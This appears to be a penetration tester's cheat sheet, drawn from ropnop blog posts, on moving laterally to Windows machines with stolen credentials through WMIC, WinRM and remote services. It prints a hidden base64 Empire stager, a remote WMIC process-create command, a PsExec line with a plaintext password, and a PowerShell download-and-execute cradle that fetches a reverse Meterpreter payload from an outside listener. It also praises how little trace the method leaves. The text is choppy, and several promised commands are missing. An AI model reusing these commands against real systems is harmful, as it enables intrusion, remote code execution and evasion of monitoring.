Executing commands via WMIC : https://blog.ropnop.com/using-credentials-to-own-windows-boxes-part-3-wmi-and-winrm/
WMI Process Create : The heart in Nishang and Powersploit.
TheWin32_Processclass can be called via WMI to query, modify, terminate, and_create_running processes.
As a quick example, here's a command to launch "calc.exe" on a local machine via a WMI statement:
/node :remotely create processes and execute commands
Create stager using empire launcher
powershell.exe -NoP -sta -NonI -W Hidden -Enc JABXAEMAPQBOAEUAVwAtAE8AQgBKAGUAQw...truncated...
wmic /node:ordws01 /user:CSCOU\jarrieta path win32_process call create "**empire launcher string here**"
On the victim machine, no window opened, no binary was dropped, no service was created, and unless the machine is configured to log WMI-Activity, no easily traceable log was left behind. Sexy.
This is the same technique that the Kali tools "wmiexec.py", "wmis" and CrackMapExec use.
WinRM
Windows Remote Management(WinRM) is a Microsoft protocol that allows remote management of Windows machines over HTTP(S) using SOAP.
The easiest way to detect whether WinRM is available is by seeing if the port is opened. WinRM will listen on one of two ports:
- 5985/tcp (HTTP)
- 5986/tcp (HTTPS)
Initiating WinRM Session.
We first have to configure our attack machine to work with WinRM as well. We need to enable it and add any "victims" as trusted hosts. From an elevated PowerShell prompt, run the following two commands:
Enable-PSRemoting -Force
Set-Item wsman:\localhost\client\trustedhosts *
Once the attack machine is configured, use theTest-WSManfunction to test whether the target is configured for WinRM. You should see some information returned about the protocol version and wsmid:
In this case we see that "ordws01" is configured, but "ordws04" is not.
Now we can use PowerShell'sInvoke-Commandto remotely execute a command on the target over WinRM. To remotely runipconfigand see the output:
Invoke-Command -Computer ordws01 -ScriptBlock {ipconfig /all} -credential CSCOU\jarrieta
Or, if you want to drop right into an interactive PowerShell session, use theEnter-PSSessionfunction:
Forcing WinRM Open. If you really want to use PS Remoting and WinRM but the target isn't configured for it, you could "force" it on through a single command. I wouldn't recommend this but if you really wanted to use WinRM or PSRemoting than by all means do it this way. For example, using PSExec:
PS C:\tools\SysinternalsSuite
>
.\PsExec.exe \\ordws04 -u cscou\jarrieta -p nastyCutt3r -h -d powershell.exe "enable-psre
moting -force"
Executing commands via services : https://blog.ropnop.com/using-credentials-to-own-windows-boxes-part-2-psexec-and-services/
As smbexec demonstrated, it's possible to execute commands directly from service binPaths instead of needing a binary. This can be a useful trick to keep in your back pocket if you need to just execute one arbitrary command on a target Windows machine. As a quick example, let's get a Meterpreter shell using a remote service_without_a binary.
We'll use Metasploit'sweb_deliverymodule and choose a PowerShell target with a reverse Meterpreter payload. The listener is set up and it tells us the command to execute on the target machine:
powershell.exe -nop -w hidden -c $k=new-object net.webclient;$k.proxy=[Net.WebRequest]::GetSystemWebProxy();$k.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $k.downloadstring('http://10.9.122.8:8080/AZPLhG9txdFhS9n');
From our Windows attack box, we create a remote service ("metpsh") and set the binPath to execute cmd.exe with our payload:
And then start it:
It errors out because our service doesn't respond, but if we look at our Metasploit listener we see that the callback was made and the payload executed:
And we just launched a meterpreter payload remotely through a Windows service without dropping a binary.